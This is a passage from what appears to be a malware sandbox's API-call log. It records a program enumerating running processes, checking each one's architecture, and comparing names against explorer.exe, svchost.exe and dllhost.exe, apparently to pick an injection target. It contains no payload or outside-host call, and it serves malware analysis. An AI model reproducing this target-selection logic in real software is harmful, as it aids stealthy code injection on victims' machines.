th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0177.701] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0177.701] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0177.701] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0177.702] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0177.702] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0177.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0177.703] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0177.703] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0177.704] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0177.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0177.704] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.704] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.704] CloseHandle (hObject=0xec) returned 1 [0177.705] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0177.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0177.705] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0177.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0177.706] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.706] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.706] CloseHandle (hObject=0xec) returned 1 [0177.706] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0177.706] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0177.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0177.707] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0177.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0177.707] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.707] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.707] CloseHandle (hObject=0xec) returned 1 [0177.707] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0177.707] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0177.707] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0177.707] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0177.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0177.708] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.708] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.708] CloseHandle (hObject=0xec) returned 1 [0177.708] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0177.708] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0177.708] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0177.708] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0177.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0177.709] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.709] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.709] CloseHandle (hObject=0xec) returned 1 [0177.709] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0177.709] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0177.709] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0177.709] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0177.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0177.709] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.709] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.710] CloseHandle (hObject=0xec) returned 1 [0177.710] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0177.710] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0177.710] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0177.710] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0177.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0177.710] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.710] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.710] CloseHandle (hObject=0xec) returned 1 [0177.710] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0177.710] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0177.710] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0177.710] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0177.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0177.711] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.711] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.711] CloseHandle (hObject=0xec) returned 1 [0177.711] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0177.711] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0177.711] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0177.711] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0177.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0177.711] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.712] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.712] CloseHandle (hObject=0xec) returned 1 [0177.712] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0177.712] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0177.712] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0177.712] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0177.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0177.712] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.712] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.712] CloseHandle (hObject=0xec) returned 1 [0177.712] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0177.712] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0177.712] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0177.712] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0177.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0177.713] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.713] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.713] CloseHandle (hObject=0xec) returned 1 [0177.713] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0177.713] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0177.713] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0177.713] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0177.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0177.714] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.714] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.714] CloseHandle (hObject=0xec) returned 1 [0177.714] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0177.714] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0177.714] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0177.714] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0177.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0177.714] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.714] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.714] CloseHandle (hObject=0xec) returned 1 [0177.714] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0177.714] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0177.714] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0177.714] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0177.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0177.715] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.715] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.715] CloseHandle (hObject=0xec) returned 1 [0177.715] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0177.715] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0177.715] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0177.715] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0177.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0177.716] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.716] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.716] CloseHandle (hObject=0xec) returned 1 [0177.716] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0177.716] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0177.716] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0177.716] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0177.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0177.716] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.716] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.716] CloseHandle (hObject=0xec) returned 1 [0177.717] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0177.717] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0177.717] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0177.717] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0177.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0177.717] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.717] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.717] CloseHandle (hObject=0xec) returned 1 [0177.717] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0177.717] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0177.717] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0177.717] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0177.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0177.718] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.718] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.718] CloseHandle (hObject=0xec) returned 1 [0177.718] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0177.718] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0177.718] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0177.718] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0177.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0177.719] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.719] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.719] CloseHandle (hObject=0xec) returned 1 [0177.719] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0177.719] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0177.719] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0177.719] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0177.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0177.719] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.719] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.719] CloseHandle (hObject=0xec) returned 1 [0177.719] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0177.719] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0177.719] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0177.719] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0177.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0177.720] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.720] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.720] CloseHandle (hObject=0xec) returned 1 [0177.720] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0177.720] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0177.720] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0177.720] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0177.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0177.721] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.721] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.721] CloseHandle (hObject=0xec) returned 1 [0177.721] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0177.721] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0177.721] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0177.721] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0177.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0177.721] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.721] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.721] CloseHandle (hObject=0xec) returned 1 [0177.721] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0177.721] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0177.721] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0177.721] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0177.722] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0177.722] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0177.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0177.723] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: 